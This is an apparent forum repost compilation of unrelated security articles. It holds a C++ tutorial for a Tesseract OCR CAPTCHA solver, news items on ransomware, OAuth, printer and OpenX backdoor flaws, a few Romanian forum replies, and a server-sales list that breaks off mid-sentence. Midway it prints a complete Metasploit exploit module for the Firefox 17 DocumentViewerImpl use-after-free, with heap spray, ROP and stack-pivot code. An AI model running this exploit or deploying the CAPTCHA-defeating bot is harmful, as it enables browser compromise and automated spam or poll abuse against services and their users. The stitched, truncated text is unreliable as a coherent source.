Matt

We are all familiar with CAPTCHA—an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”. CAPTCHA is a test to tell whether the one who solves the test is human or machine. The machine in this case is practically computer software acting as a robot, also known as bot. CAPTCHA prevents bots from using various types of computing services or collecting certain types of sensitive information. For example to prevent automated free email address registration or automated form submission in—CAPTCHA protected—polling. The assumption of CAPTCHA is only a human would pass the CAPTCHA test, while bots would fail. This article introduces methods that interested parties may use to defeat the CAPTCHA protection by using bots, at the lowest possible cost and strategies to improve the CAPTCHA difficulty to prevent abuse by such bots. Why Would You Need an Automated CAPTCHA Solver? There are both legitimate and illegal reasons to use automated CAPTCHA solving. I’ll start with the illegal ones. For spammers, it’s in their interest to harvest as many email addresses as possible because they are paid based on the numbers of spam they generate and CAPTCHA is getting in their way. Therefore, they really need a cost effective way to overcome the CAPTCHA protection. Another illegal use case scenario is when a party wants to “skew” the result of online polling to suit their needs—where the polling data entry protected by CAPTCHA. As for the legal ones, it could be a new business partner wanting to automate access to the service of a certain company but the service is protected by CAPTCHA (to prevent abuse). However, the service provider has yet to provide an Application Programming Interface (API) for its service to be used by the new business partner—maybe due to the time constraint or budget constraint to provide the API. In this case the new business partner doesn’t have a choice but resort to automate the CAPTCHA solving needs. Approaches to Implement an Automated CAPTCHA Solver There are two major approaches to implement an automated CAPTCHA solver: 1.Using a third party CAPTCHA solving service. 2.Creating a bot that uses Optical Character Recognition (OCR) to try solving the CAPTCHA characters. There are several providers of third party CAPTCHA solving services at the moment, for example: Death by CAPTCHA (http://deathbyCAPTCHA.com), de-captcher (Short text image recognition, OCR, recognition software) and decaptcher2 (Decaptcher service with best quality - decaptcher2.com). Most of these services work by using “human automation”, i.e. they use human automation to recognize the CAPTCHA characters and send back the result to you. The pros and cons of using third party CAPTCHA service like these are: The pros: the accuracy probability is higher than using an OCR approach because human automation is inherently better in recognizing CAPTCHA than machines and the service providers usually provides you with easy to use API to interface with their CAPTCHA solving service over the net. The cons: the cost for a high number of CAPTCHA solving needs is quite prohibitive because it adds up quickly over time and there’s the problem of latency. Where the speed at which the CAPTCHA is solved doesn’t meet your solving “timeout” requirement—in the latter case, the CAPTCHA is solved correctly but it takes too much time that the session for the CAPTCHA solving page has expired. In my experience, CAPTCHA solving services tend to be better at solving CAPTCHAs—relative to OCR approach—but have the aforementioned latency problem. The second approach is much more complex than the first—than using third party CAPTCHA solving services. However, it lacks in precision compared to the first approach. Moreover, the second approach could not solve complex CAPTCHAs in many situations. However, for rather trivial CAPTCHAs, the second approach is much more cost effective and more or less usable. You might be surprised that in practice, trivial CAPTCHAs are still widely used, especially for websites for very specific services, such as mobile (cellphone) operator—usually prepaid ones where subscribers can top-up their account via web, another example is online ticketing for events and so on. These service providers don’t have lots of hits because only those wanting to use their services would go to their websites. Perhaps, that’s the reason why they don’t employ sophisticated CAPTCHAs, or maybe the present (trivial) CAPTCHA is good enough for them. The focus of this article is the second approach, i.e. using OCR to defeat the CAPTCHA. Of course this solution cannot solve even “simple” CAPTCHA one hundred percent of the time. Nonetheless, this article is only meant to be introductory material to understand the architecture of such a solution. It’s not meant to be a guide to “fight” CAPTCHA used by the big boys like Google, Facebook or Twitter. That would require far more advanced CAPTCHA solving solutions. Implementing Our Simple CAPTCHA Solver We are going to use a readily available OCR library to build our CAPTCHA solver bot. Details of the tools to get the CAPTCHA images are not going to be explained here. The focus is only on building a small program to solve the readily available CAPTCHA image. Nonetheless, this article explains the generic architecture of a complete CAPTCHA solver solution. Prerequisites This section assumes that you are quite proficient in using a C/C++ Integrated Development Environment (IDE), or using a C/C++ compiler via command line directly. It also assumes that you know the basics on creating Windows DLLs and linking with them. If you are still confused, you can use your favorite search engine to look for relevant articles on the subject. The Big Picture Now, let’s start with the big picture. The overall architecture of a CAPTCHA solver solution looks like 1. There are two main components of a CAPTCHA solver solution, the web “scraper” and the CAPTCHA solver itself, as shown in 1. Figure: CAPTCHA Solver Solution Basic Architecture The purpose of the web scraper is to scrape the target web page, i.e. “browse” the target web page as if a human would browse a webpage, extract data required to process the page and sending “automated” feedback to the target web page. For example, if a web form is on the target web page, the web scraper would extract the form entries from the web page, then the web scraper fills the required data to the form entries and sends the “response” to the target web page—as if human enters required data and then clicking on the submit button on the target web page. In a more complicated target web page, the data entry process is protected by a CAPTCHA. Therefore, the web scraper must call or implement a CAPTCHA solver to fulfill the CAPTCHA check requirement. Let’s take a look the solution in 1 in more detail. These are the steps carried out in 1: 1.The web scraper fetches the contents of the target web page. 2.The web scraper extracts the CAPTCHA image from the target web page. 3.The CAPTCHA image is sent to the CAPTCHA solver. 4.The CAPTCHA solver solves the CAPTCHA and emits CAPTCHA string as the result. 5.The CAPTCHA string is sent back to the web scraper. 6.The web scraper sends the feedback—including the CAPTCHA string—to the target web page URL. This article only focuses on the CAPTCHA solver component. As for the web scraper, it’s a completely different subject and it varies depending on the web site that’s being scraped. Using Open Source OCR Library to Solve CAPTCHA One of the ways to defeat CAPTCHA automatically is to use OCR library to recognize the string in the CAPTCHA. Contrary to what you might think; OCR library recognizes string not just by trying to recognize individual letters (and digits) but also by using context information. For example, if you know that the string you’re trying to recognize contains only letters, you can feed that information to the OCR library to boost the recognition accuracy. Similarly, if the target string contains only digits with no alphabet, you can instruct the library to recognize only digits, not letters. Other possible context is the language of the string you’re trying to solve. Now, let’s move to the concrete implementation. This article shows you how to implement the CAPTCHA solver by using the open source Tesseract OCR library. The library is available at https://code.google.com/p/tesseract-ocr/. Tesseract is written in C++. Therefore, the most natural way to use it is to write your CAPTCHA solver in C++ or C. You have to be aware though, that C++ uses name mangling, i.e. the function name seen on the source code is not the same as the one in the compiled object file, dll or executable produced by the compiler. Anyway, Tesseract depends on Leptonica, another open source library that handles various image file formats. Therefore, you need to link to Leptonica as well as Tesseract in your program in order to use Tesseract OCR for CAPTCHA solving. The implementation provided here is Windows specific. You can download the Visual Studio 2008 code for Tesseract in this link: https://code.google.com/p/tesseract-ocr/downloads/detail?name=tesseract-ocr-3.02-vs2008.zip&can=2&q=. Additionally, you can download the Leptonica v1.68 dependency here: https://code.google.com/p/leptonica/downloads/list. For the sake of portability between different languages, the implementation here is in the form of a “plain C” Windows DLL that interfaces to Tesseract DLL—and indirectly to Leptonica DLL because Tesseract depends on Leptonica. I will also provide the code of a simple test application to test the DLL. Perhaps you’re still confused about this; 2 should clarify what I meant. Figure: Our CAPTCHA Solver Implementation Architecture It is clear form 2 that we have to create two things, first is the Windows DLL wrapper code and the second is the test application to make sure our DLL is working as intended. The Windows DLL wrapper code consists of two files: CAPTCHA_solver_dll.h and CAPTCHA_solver_dll.cpp . 2 shows the presence of Tesseract “learning” Data. If you install Tesseract in your machine, this data is placed in tessdata directory in the Tesseract installation directory. You don’t need to install Tesseract if you want to use it in your own program. However, you need to have the Tesseract “learning” data—the tessdata directory and its contents—somewhere in the machine that would run your program and you must set the TESSDATA_PREFIX environment variable to the absolute path of the directory containing the tessdata directory, not the path of the tessdata directory. You can do that via Control Panel|System|Advanced System Settings|Environment Variables|System variables. After that, it’s highly advisable to log-off and log-on again or to restart the machine because sometimes the new environment variable is not updated as we wished if you don’t do so. Setting TESSDATA_PREFIX environment variable is needed because Tesseract requires this environment variable when it runs to query the “learning” data. Now, let’s move to the details of using Tesseract in the CAPTCHA_solver_dll.cpp file. Using Tesseract is quite easy. These are the logical steps to solve a CAPTCHA image with Tesseract: 1.Initialize tesseract API object to be used. 2.Check the whether the input file format is supported or not. 3.Process the input image file to obtain the CAPTCHA string. 4.Copy the result string to the output buffer. This is required because Tesseract uses an internal representation for string which is not guaranteed to be compatible with the string format we want—plain C string, i.e. null-terminated string. Now that the algorithm to use Tesseract is clear, I’ll show you the C++ code that implements the algorithm. 1 shows the solve_CAPTCHA() function which invokes Tesseract to “solve” (read) the CAPTCHA string passed in the input CAPTCHA image passed to the function via the image_file_path input parameter. This is the only function an application needs to use Tesseract via our Windows DLL wrapper. The image_file_path input parameter in solve_CAPTCHA() function contains path to the CAPTCHA image to be solved. 1 doesn’t show the entire code in CAPTCHA_solver_dll.cpp, only those important to implement the very thin wrapper to Tesseract. The implementation of the steps/algorithm above in 1 is very straight forward. Listing: solve_CAPTCHA() Function Listing in CAPTCHA_solver_dll.cpp File #include "stdafx.h"#include "CAPTCHA_solver_dll.h" ... // Variable to store the result of CAPTCHA processing static char g_CAPTCHA_string[MAX_CAPTCHA_STRING_LENGTH + 1]; ... // This is an exported function. /// /// This function invokes tesseract library function to solve the CAPTCHA image /// in the image_file_path parameter. /// ///Path of the CAPTCHA image file. /// Pointer to string that will hold the CAPTCHA string result /// CAPTCHA_SOLVER_DLL_API char* solve_CAPTCHA( const char* image_file_path ) { // // STEP 1: Initialize tesseract object to be used. // const char* lang = "eng"; char* config_file_path = "digits"; /* Hardcode the config file to be used to "$TESSDATA_PREFIX/configs/digits" NOTE: As long as $TESSDATA_PREFIX has been exported to as Windows environment variable, using only the word "digits" here should work. */ tesseract::TessBaseAPI api; api.Init(image_file_path /* datapath */, lang /* language */, tesseract::OEM_DEFAULT /* OcrEngineMode mode */, &config_file_path /* char **configs */, 1 /* configs_size -- only config_file_path */, NULL /* const GenericVector *vars_vec */, NULL /* const GenericVector *vars_values */, false /* bool set_only_non_debug_params */); tesseract::PageSegMode pagesegmode = tesseract::PSM_AUTO; if (api.GetPageSegMode() == tesseract::PSM_SINGLE_BLOCK) api.SetPageSegMode(pagesegmode); // // STEP 2: Check the whether the input file format is supported or not // FILE* fin = fopen(image_file_path, "rb"); if (fin == NULL) { return NULL; } fclose(fin); PIX *pixs; if ((pixs = pixRead(image_file_path)) == NULL) { return NULL; } pixDestroy(&pixs); // // STEP 3: Process the image. // The result is a STRING object pointed by text_out variable below. // STRING text_out; if (!api.ProcessPages(image_file_path, NULL, 0, &text_out)) { return NULL; } // // STEP 4: Copy the result string to the output buffer // a. Use text_out.strdup() to get a pointer to copy of the CAPTCHA solver result. // b. Free the heap consumed by the duplicate of the CAPTCHA string result. // memset(g_CAPTCHA_string, '\0', sizeof(g_CAPTCHA_string)); char* result = text_out.strdup(); strncpy(g_CAPTCHA_string, result, sizeof(g_CAPTCHA_string)); free(result); return g_CAPTCHA_string; } The PIX object in 1 is a Leptonica object. PIX object handles the input image to be passed to Tesseract. Most of the image-related processing in Tesseract is handled by Leptonica. The CAPTCHA_SOLVER_DLL_API identifier in 1 is a macro to define the linkage type of the function. You can see the details of this identifier in 2 (CAPTCHA_solver_dll.h and). CAPTCHA_SOLVER_DLL_API identifier in 1 maps to __declspec(dllexport) because the CAPTCHA_SOLVER_DLL_EXPORTS constant is defined in the preprocessor setting of the Visual Studio project containing the CAPTCHA_solver_dll.cpp file. As you can see in 2, if CAPTCHA_SOLVER_DLL_EXPORTS constant is defined, CAPTCHA_SOLVER_DLL_API identifier resolves to __declspec(dllexport). 1, gives a “context” hint—a.k.a heuristic—to Tesseract in the form of language setting and configuration file setting. The language is set to English and the configuration file is set to digits only, i.e. Tesseract should interpret the inputs as digit only. This is done in step 1 in In 1. This can be done because it is assumed that we have done preliminary assessment on the target CAPTCHA and the result is the input CAPTCHA always consists of digits. Listing: CAPTCHA_solver_dll.h File #define __CAPTCHA_SOLVER_DLL_H__// The following ifdef block is the standard way of creating macros which make exporting // from a DLL simpler. All files within this DLL are compiled with the // CAPTCHA_SOLVER_DLL_EXPORTS symbol defined on the command line. // This symbol should not be defined on any project that uses this DLL. // This way any other project whose source files include this file see // CAPTCHA_SOLVER_DLL_API functions as being imported from a DLL, whereas this DLL sees // symbols defined with this macro as being exported. #ifdef CAPTCHA_SOLVER_DLL_EXPORTS #define CAPTCHA_SOLVER_DLL_API __declspec(dllexport) #else #define CAPTCHA_SOLVER_DLL_API __declspec(dllimport) #endif #ifndef MAX_CAPTCHA_STRING_LENGTH #define MAX_CAPTCHA_STRING_LENGTH 256 #endif #ifdef __cplusplus extern "C" { #endif CAPTCHA_SOLVER_DLL_API char* solve_CAPTCHA( const char* image_file_path ); #ifdef __cplusplus } #endif #endif // __CAPTCHA_SOLVER_DLL_H__ With the Windows DLL wrapper completed, we can now move to the test application source code. 3 shows the source code of the test application for our Tesseract wrapper library. This test application is again, Windows-specific. If you are using Visual Studio to compile the code in 3, set the character set in the project setting to Multi-Byte Character Set (MBCS)—via the “Project Properties”|Configuration Properties|Project Defaults|Character Set setting. This setting instructs Visual Studio to compile the project in MBCS mode, i.e. ANSI C-compatible mode. Thus, the string handling in the code would be set to ANSI C string “mode”. This is important to do because by default, Visual Studio sets the character set to Unicode, which is not compatible with the output from the Tesseract wrapper library we built earlier. Listing Test Application (CAPTCHA_solver_dll_test_app) Linked to CAPTCHA_solver_dll.dll // CAPTCHA_solver_dll_test_app.cpp : Defines the entry point for the console application.// #include "stdafx.h" #include "CAPTCHA_solver_dll.h" int _tmain(int argc, _TCHAR* argv[]) { char CAPTCHA_string[MAX_CAPTCHA_STRING_LENGTH]; /// Invocation rule: test_app [image_file_path] if (argc != 2) { printf("Error! Wrong input parameters\n"); printf("Usage: %s [image_file_path]\n", argv[0]); return 0; } /// Step 1: solve CAPTCHA memset(CAPTCHA_string, '\0', sizeof(CAPTCHA_string)); strncpy_s(CAPTCHA_string, sizeof(CAPTCHA_string), solve_CAPTCHA(argv[1]), _TRUNCATE); /// Step 2: show CAPTCHA string printf("CAPTCHA string = %s\n", CAPTCHA_string); return 0; } The code in 3 is a Windows-specific C source code because the string function is Windows-specific—a secure version of the default C string function. The line in 3 that invokes solve_CAPTCHA() function in the wrapper DLL we built earlier is: strncpy_s(CAPTCHA_string, sizeof(CAPTCHA_string), solve_CAPTCHA(argv[1]), _TRUNCATE);You can look up the details of the strncpy_s() secure string copy function at: strncpy_s, _strncpy_s_l, wcsncpy_s, _wcsncpy_s_l, _mbsncpy_s, _mbsncpy_s_l while the _TRUNCATE constant is explained here: _TRUNCATE (CRT). This function is a secure version of the strncpy() function. As you can see, using the wrapper DLL involve only one function call in the code that uses the library. Of course, you have to link against the wrapper library in your Visual Studio project or in other type of IDE that you use. Nothing is out of the ordinary in the code in 3. Therefore, you should be able to grasp it right away. Testing Our CAPTCHA Solver Application At this point, the entire CAPTCHA solver solution is complete. It’s time to put it into test. 3 shows the CAPTCHAs I used to test the CAPTCHA solver solution explained in the previous sections. Figure: CAPTCHA Samples Used for Testing (lumped together into one image) 4 shows how I invoke the test application to solve the CAPTCHA string in image 8.jpg and 9.jpg respectively. As you can see, the test application correctly reads the CAPTCHA string. Figure: Running the CAPTCHA Solver Test Application As mentioned in 1explanation, the Tesseract wrapper DLL gives heuristics to Tesseract that the input consists of digits and it should be regarded as English in nature, not other character sets such as Chinese, Thais or Japanese. 1 shows the result of invoking our test application with the above input (CAPTCHA) files. Table: CAPTCHA Solving Result Anyway, the automated CAPTCHA solver solution I presented here is very rudimentary. It doesn’t do any preprocessing to the input image which could improve the CAPTCHA solver accuracy, albeit maybe just a little. But, with 40% near miss, that could boost the accuracy to a whopping 80% accuracy. Closing Thoughts There are several possible ways to improve the CAPTCHA solver accuracy, first we could do preprocessing to make the CAPTCHA image clearer and second, we can add one more “context” as heuristic to the CAPTCHA solving solution, such as giving a hint to Tesseract that the input is always six characters. In the end, automated CAPTCHA solving is a gray area because it’s not clear in terms of legality in many places. In Indonesia (where I live), it’s legal only due to absence of regulation at the moment, because the basic premise in Indonesian Law is something not yet regulated deemed legal. I hope that this article opens up a new understanding on how automated CAPTCHA solving might be carried-out. Sursa Resources.InfoSecInstitute.Com

Cybercrooks have found another application for ransomware, the horrible software that locks up a PC until money is handed over: it's now being used to push fake antivirus onto victims. Reveton - a widespread piece of ransomware that infects machines, falsely accuses marks of downloading images of child abuse and demands a fine to unlock the computers - has been adjusted to frighten users into buying craptastic security software. Said software is bogus antivirus, otherwise known as scareware, which announces the PC is riddled with computer viruses and Trojans, a compelling claim that is also a lie: users are tricked into paying for a full version of the dud software in order to remove the non-existent nasties. Running such programs could utterly compromise the machine and the user's security. Christopher Boyd, a senior threat researcher at ThreatTrack Security, has more on this use of ransomware to push sales of scareware in a blog post featuring screenshots here. The Reveton hijack intercepted by ThreatTrack "ditches the locked desktop in favour of something a little more old school – horror of horrors, a piece of Fake AV called Live Security Professional," Boyd explained. Users are swooped on by the software nasty after visiting websites contaminated with browser exploits and the like courtesy of the Sweet Orange Exploit Kit. Internet scumbags have previously used ransomware to peddle survey scams that earned crooks affiliate revenues from dodgy marketing firms. Grafting scareware onto ransomware is simply the next step. ® Sursa TheRegister.co.uk

A security flaw in Microsoft Yammer's open authorisations standards (oAuth) has been uncovered by bug hunters. The flaw was revealed on the Full Disclosure forum and relates to the technology used by Yammer to allow secure interactions with third-party apps. Kaspersky security researcher Marta Janus told V3 the vulnerability theoretically could leave Yammer users open to attack by cyber criminals. "The vulnerability that is exploited is an oAuth Bypass (Session Token) vulnerability. oAuth is a widely used standard by many sites including Facebook and Twitter. It allows secure interaction between the sites and third-party apps without the user having to enter their usernames and passwords each time, so in effect delegating the authentication task, which makes for a better user experience," said Janus. "The issue here was not with oAuth itself but Yammer's implementation. The flaw was that there were no checks on the legitimacy of the server so that user requests could potentially be redirected to a malicious server, and of course by accessing a user's profile the account, can be taken over by the perpetrator and used malignly." At the time of publishing Microsoft had not responded to V3's request for comment on the attack. However, Janus confirmed that thanks to the bug hunters' responsible disclosure strategy, Microsoft has already discretely rolled out a fix. "The process of disclosure seems to have been handled well in this case. The researchers disclosed it to the vendor – Microsoft – on 10 July 2013 and they issued an automatic fix on 30 July and then it was publicly disclosed," said Janus. Janus said despite Microsoft's rapid response, the discovery does still have some troubling implications, regarding what data Yammer stores. "Another issue raised by the researchers is that supposedly live secure sessions are being captured by search engines. It is these session tokens which are then used in the exploit. There is no real reason why this information should be collected by search engines," said Janus. Full disclosure has been a hot topic in the security community for decades, with many divided over how vulnerability researchers should responsibly disclose their findings. Most recently Apple software hacker Charlie Miller released a white paper detailing how to hack moving cars, saying he hoped the release would motivate researchers to fix ongoing problems in smart car security procedures. Sursa V3.co.uk

PayPal has launched its new Check In mobile payment service in London Richmond, listing it as a key area in its ongoing bid to increase UK wireless transaction levels. The Check In service will initially launch in 12 Richmond high street premises including cafes, restaurants, shops, a hotel and a fish and chip shop. The service is available via iOS, Android and Windows Phone apps. It works in a similar way to Visa's V.me digital wallet, but adds additional facial recognition security and store-tracking features. When activated the app highlights nearby shops and restaurants that accept PayPal payments. It then asks the the user to check in to the shop by clicking on its icon. Once checked in, the user's name and photo appears on the shop's payment system, letting the cashier check the person making the payment is the account's owner. PayPal head of retail services Rob Harper listed Check In as a key step in the company's ongoing bid to boost mobile payments levels in the UK. "PayPal first brought ‘pay by mobile' to the UK high street two years ago. Through our Richmond initiative, we're pleased to help local businesses of all sizes offer a new more personal experience, while never having to turn away customers who don't have enough cash on them to pay. Now locals in Richmond can leave their wallet or purse at home and be the first in the country to use their profile picture to pay," he said. "This is another step on the journey towards a walletless high street, where customers will be able to leave their wallet or purse at home and pay using their phone or tablet. We predict that by 2016 this will become a reality. Our Richmond initiative shows that innovation is alive and well on the British high street." Check In's added security features are also expected to be a key seller for the service. Mobile and wireless payments security protocols have been an ongoing concern for British end users. Most recently Visa issued a statement promising that mobile payments are just as secure as their chip and pin equivalents. Sursa V3.co.uk

OpenX, a leader provider of digital and mobile advertising technology has accordingly served backdoor that are injected into the Code and allows hackers to control over your web browser. German tech site the Heise notified Germany's computer emergency response team (CERT) this week about the OpenX Ad Server (2.8.10) backdoor, allowing an attacker to execute any PHP code via the "eval" and could have provided attackers full acces to their web sites. The OpenX team has confirmed the breach and OpenX senior application security engineer Nick Soraccor said that two files in the binary distribution of 2.8.10 had been replaced with modified files that contained a remote code execution vulnerability. The attack code is written in PHP but is hidden in a JavaScript file that is part of a video player plugin (vastServerVideoPlayer) in the OpenX distribution. This vulnerability only applies to the free downloadable open source product, OpenX Market ( exchange ) and OpenX Lift (SSP) are not affected. Server administrator can find out if they are running the OpenX version that contains the backdoor by searching for PHP tags inside .js files.Researchers from Sucuri provide a simple command for this : $ grep -r --include "*.js"'<?php' DIRECTORYWHEREYOURSITEIS This is not the first time when Opex.org has been hacked.Last year in March 2012 , it was hacked and served malware to users. OpenX has now released OpenX source v2.8.11, which according to Soraccor, is a mandatory upgrade for all users of 2.8.10 that should be applied immediately. Sursa TheHackerNews.Com

E om de incredere al forumului si de cuvant. Daca te uiti prin forum a sponsorizat cu 500$ un proiect asa ca.. trust him.

Cum adica ai nevoie de o carte?? Carte pdf sau carte reala? Ce categorie ?

Security flaws in a range of HP printers create a way for hackers to lift administrator's passwords and other potentially sensitive information from vulnerable devices, infosec experts have warned. HP has released patches for the affected LaserJet Pro printers to defend against the vulnerability (CVE-2013-4807), which was discovered by Micha Sajdak of Securitum.pl. Sajdak discovered it was possible to extract plaintext versions of users' passwords via hidden URLs hardcoded into the printers’ firmware. A hex representation of the admin password is stored in a plaintext URL, though it looks encrypted to a casual observer. Sajdak also discovered Wi-Fi-enabled printers leaked Wi-Fi settings and Wi-Fi Protected Setup PIN codes, as an advisory from the Polish security researcher explains. HP has released firmware updates for the following affected printers: HP LaserJet Pro P1102w HP LaserJet Pro P1606dn, HP LaserJet Pro M1212nf MFP, HP LaserJet Pro M1212nf MFP, HP LaserJet Pro M1213nf MFP, HP LaserJet Pro M1214nfh MFP, HP LaserJet Pro M1216nfh MFP, HP LaserJet Pro M1217nfw MFP, HP LaserJet Pro M1218nfs MFP and HP LaserJet Pro CP1025nw. Consumers aren't very good at patching their computers, much less their printers, which rarely need security updates. "The bad news is that many printer owners probably aren’t aware that the security issue exists, or simply won’t bother to apply the firmware update," security watcher Graham Cluley notes. ® Sursa TheRegister.co.uk

Description : This Metasploit module exploits a vulnerability found on Firefox 17.0.6, specifically an use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users. Author : webDEViL, sinn3r, juan vazquez, temp66, Nils Source : Firefox onreadystatechange Event DocumentViewerImpl Use After Free ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free', 'Description' => %q{ This module exploits a vulnerability found on Firefox 17.0.6, specifically an use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nils', # vulnerability discovery 'Unknown', # 1day exploit, prolly the FBI 'w3bd3vil', # 1day analysis 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-1690' ], [ 'OSVDB', '94584'], [ 'BID', '60778'], [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ], [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ], [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ], [ 'URL', 'http://krash.in/ffn0day.txt' ], [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Firefox 17 & Firefox 21 / Windows XP SP3', { 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory 'RetGadget' => 0x77c3ee16, # ret from msvcrt 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory } ] ], 'DisclosureDate' => 'Jun 25 2013', 'DefaultTarget' => 0)) end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def on_request_uri(cli, request) agent = request.headers['User-Agent'] vprint_status("Agent: #{agent}") if agent !~ /Windows NT 5\.1/ print_error("Windows XP not found, sending 404: #{agent}") send_not_found(cli) return end if agent !~ /Firefox\/17/ or agent !~ /Firefox\/21/ print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource # build html code = [ target['VFuncPtr'], target['RetGadget'], target['StackPivot'], junk ].pack("V*") code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch)) content = <<-HTML <html> <body> <iframe src="#{my_uri}/iframe.html"></iframe> </body></html> HTML # build iframe iframe = <<-IFRAME <script> var z="<body><img src='nonexistant.html' onerror=\\"\\" ></body>"; var test = new Array(); var heap_chunks; function heapSpray(shellcode, fillsled) { var chunk_size, headersize, fillsled_len, code; var i, codewithnum; chunk_size = 0x40000; headersize = 0x10; fillsled_len = chunk_size - (headersize + shellcode.length); while (fillsled.length <fillsled_len) fillsled += fillsled; fillsled = fillsled.substring(0, fillsled_len); code = shellcode + fillsled; heap_chunks = new Array(); for (i = 0; i<1000; i++) { codewithnum = "HERE" + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } } function b() { for(var c=0;1024>c;c++) { test[c]=new ArrayBuffer(180); bufView = new Uint32Array(test[c]); for (var i=0; i < 45; i++) { bufView[i] = #{target['FakeObject']}; } } } function a() { window.stop(); var myshellcode = unescape("#{js_code}"); var myfillsled = unescape("#{js_random}"); heapSpray(myshellcode,myfillsled); b(); window.parent.frames[0].frameElement.ownerDocument.write(z); } document.addEventListener("readystatechange",a,null); </script> IFRAME print_status("URI #{request.uri} requested...") if request.uri =~ /iframe\.html/ print_status("Sending iframe HTML") send_response(cli, iframe, {'Content-Type'=>'text/html'}) return end print_status("Sending HTML") send_response(cli, content, {'Content-Type'=>'text/html'}) end end

Description : Included in this archive is a presentation of Android Weblogin: Google's Skeleton Key along with various proof of concept code from the talk presented at DefCon 21. Link : Download: Android Weblogin: Google's Skeleton Key ? Packet Storm

There’s much gnashing of teeth today over the discovery that Google Chrome lets you — or anyone using your computer — see the plaintext web passwords stored by your browser. This isn’t a security bug. It’s Chrome’s documented behavior, and has been all along. But an outraged blog post highlighting the issue yesterday by U.K. software developer Elliot Kember was picked up by Hacker News, thrusting Google’s security choices into the limelight. In a response on Hacker News, Google Chrome’s security chief Justin Schuh explained the company’s reasoning. Google is thinking like a security architect, and from that perspective, the company is completely right. Security folks think of your computer as a nuclear power plant, with radiation-proof compartments surrounding the core. Your browser window and your stored passwords live in the same compartment. They have to, so that Chrome can see the passwords and fill them in for you. By making it easy for you to see those passwords with your own eyes, Google is declining to pretend that the passwords are partitioned off in another compartment. The bottom line is, once a password is accessible to your browser, it’s going to be accessible to anyone who can sit in front of your browser and rest their sticky fingers on your keyboard. Short of authenticating every single password auto-fill, there’s no way around this. Here’s a simple trick that will do the job, and here’s an even more convenient bookmarklet called Reveal Password. So the suggestion that Google Chrome make you enter a “master password” to see your stored passwords is at best pointless, and at worst misleading, from a real security point of view. But there’s an argument to be made on the other side. Google could throw up some drywall in the nuclear plant, and in the end, it would probably do more good than harm. Google’s all-or-nothing security perspective is natural for a company that routinely confronts serious, state-sponsored attackers. But in day-to-day life, most Chrome users have to worry about what security geeks call the “unskilled attacker.” That’s the jealous boyfriend who might, if it’s easy enough, cage your Facebook password to check up on you later. It’s your teenaged son looking for your porn passwords. Its the dude at the coffee shop who’s left alone with your laptop for a moment while you pick up your mocha. Even the flimsiest obstacle would be effective against these threats, while serving as a moral signpost declaring the Password Manager off-limits to the kind of casual snoops who are already paging through your browser history. As long as people equate ease of access with permission, there’s value it making some things a little harder. So as a practical matter, Google should probably capitulate to the outrage and erect a barrier in front of the Chrome Password Manager. What’s terribly unfair about this, of course, is that in two years there will be another outraged blogger discovering that this barrier provides no real security, and Google will go through the wringer all over again. Sursa Wired.COM

NPD Server Brand Showdown Servers are the brains and brawn of any company, and tracking which company is building the best equipment and selling the most has become near sport among business-savvy technophiles. Speed, handling, and cost all factor into which company dominates the North American server market, which IDC reported reached $22 billion for 2012. That's why when The NPD Group, a Port Washington, N.Y.-based market sales research company, releases new market share data CRN cares. So who is this quarter's Mario Andretti of the server market? Read on to discover NPD's top 10 list of companies that earned the biggest piece of the sales' pie for servers in June, the most recent numbers available. It should be noted that this NPD market snapshot is of dollars spent on servers and build-to-order servers sold in June of 2013 through distributors Ingram Micro, Tech Data, Synnex and others. The NPD Group's Distributor Track sales database is comprised primarily of U.S. Global Technology Distribution Council members. 10. NEC Japanese IT supplier NEC rounds out NPD's top 10 list for dollar market share winners for servers in June. NPD didn't identify one system that landed NEC in the No. 10 spot; however, the system builder has been reportedly doing brisk business selling Itanium-based Unix servers for the past year. NEC's latest family of servers include its Express5800/1000 series that sport Intel's Xeon E7 processor and a 100 series blade server designed specifically for virtualization with "lower" power consumption. 9. Acer 8. Super Micro Computer Motherboard and white-box server maker Super Micro Computer, according to NPD, saw flat growth when it comes to gains and losses of the server sales' pie. The Intel partner, headquartered in San Jose, Calif., makes rack-mount, 